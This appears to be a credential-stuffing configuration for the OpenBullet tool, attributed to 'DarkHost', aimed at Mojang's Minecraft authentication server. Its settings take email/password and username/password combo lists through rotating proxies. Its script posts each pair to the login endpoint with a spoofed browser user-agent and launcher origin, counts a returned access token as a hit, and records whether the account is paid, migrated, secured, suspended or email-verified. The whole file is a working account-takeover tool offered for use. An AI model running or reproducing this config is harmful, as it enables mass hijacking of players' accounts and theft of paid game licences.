[SETTINGS]
{
  "Name": "MinecraftLauncher",
  "SuggestedBots": 1,
  "LastModified": "2019-02-07T15:19:07.9185457+01:00",
  "AdditionalInfo": "",
  "Author": "DarkHost",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://authserver.mojang.com/authenticate" AutoRedirect=TRUE 
  CONTENT "{\"agent\":{\"name\":\"Minecraft\",\"version\":1},\"username\":\"<USER>\",\"password\":\"<PASS>\",\"clientToken\":\"25cc6cb2b2b363704d84caa4b38a7b84\",\"requestUser\":true}" 
  CONTENTTYPE "application/json;charset=UTF-8" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: mojang://launcher" 
  HEADER "Host: authserver.mojang.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Invalid credentials. Invalid username or password." 
  KEYCHAIN Success OR 
    KEY "accessToken" 
PARSE "<SOURCE>" JSON "migrated" Recursive=FALSE -> CAP "Migrated" "" "" 
PARSE "<SOURCE>" JSON "paid" Recursive=FALSE -> CAP "Paid/Free" "" "" 
PARSE "<SOURCE>" JSON "name" Recursive=FALSE -> CAP "Username" "" "" 
PARSE "<SOURCE>" JSON "legacyUser" Recursive=FALSE -> CAP "Legacy" "" "" 
PARSE "<SOURCE>" JSON "migrated" Recursive=FALSE -> CAP "Migrated" "" "" 
PARSE "<SOURCE>" JSON "secured" Recursive=FALSE -> CAP "Secured" "" "" 
PARSE "<SOURCE>" JSON "suspended" Recursive=FALSE -> CAP "Suspended" "" "" 
PARSE "<SOURCE>" JSON "emailVerified" Recursive=FALSE -> CAP "EmailVerified" "" "" 
PARSE "<SOURCE>" JSON "hashed" Recursive=FALSE -> CAP "Hashed" "" "" 
